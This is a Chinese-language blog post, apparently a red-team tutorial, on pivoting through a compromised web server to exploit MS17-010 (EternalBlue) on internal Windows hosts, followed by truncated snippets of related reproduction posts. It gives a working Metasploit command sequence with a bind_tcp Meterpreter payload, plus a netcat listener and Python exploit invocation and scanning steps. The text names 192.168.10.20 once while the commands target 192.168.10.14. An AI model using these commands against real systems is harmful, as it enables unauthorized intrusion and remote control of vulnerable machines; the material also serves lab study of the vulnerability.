內網滲透之MS17 010

2021-09-26 03:36:49 字數 690 閱讀 6935

在紅藍對抗中,當拿到了位於邊界主機的許可權後,我們通常會以此為跳板,搭建乙個通往內網的隧道,以此繼續滲透內網。而在內網中首先想到的就是ms17-010了,因為在內網中,安全措施相對較弱,很多主機存在此漏洞。

現在有這麼乙個場景,我們通過web漏洞拿到了內網提供web伺服器的主機192.168.10.10,並且搭建了通往內網的隧道,現在我們通過探測發現內網主機192.168.10.14存在ms17-010漏洞,所以我們現在就要利用msf對其進行攻擊了。

我們內網的kali主機,ip為192.168.10.11,通過設定**為vps的位址,而可以訪問靶機的內網了。現在我們在kali上利用ms17-010打192.168.10.20。注意,這裡一定要用正向連線,也就是我們的kali主機主動去連線192.168.10.14。

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/bind_tcp #這裡的payload必須是正向的

set rhosts 192.168.10.14

set rhost 192.168.10.14

exploit

ms17 010漏洞復現

很老的洞了,只是老師上課講了,我就復現一遍。環境靶機為windows7並且存在此漏洞 攻擊機需要python3環境 nc lvp 8888 python ms17 010.py host 192.168.217.2 file shellcode 只需這兩條命令,便可以利用成功,其中ms17 010....

MS17 010漏洞復現

實驗環境 kali 虛擬機器 windows 7 x64 虛擬機器 1 檢視兩台機器的ip位址,且關閉win7防火牆 可見win7 ip為 192.168.15.129 kali 為 192.168.15.130 啟動 mdfconsole msfconsole 使用如下命令 第一句為利用auxil...

MS17 010 漏洞復現

開啟msf msfconsole fping a g 起始ip 結束ip 掃瞄當前區域網活躍ip fping a g 192.168.1.1 192.168.1.250 先輸入這條命令 gem install ruby smb然後,掃瞄內網有沒有ms17 010漏洞 use auxiliary sc...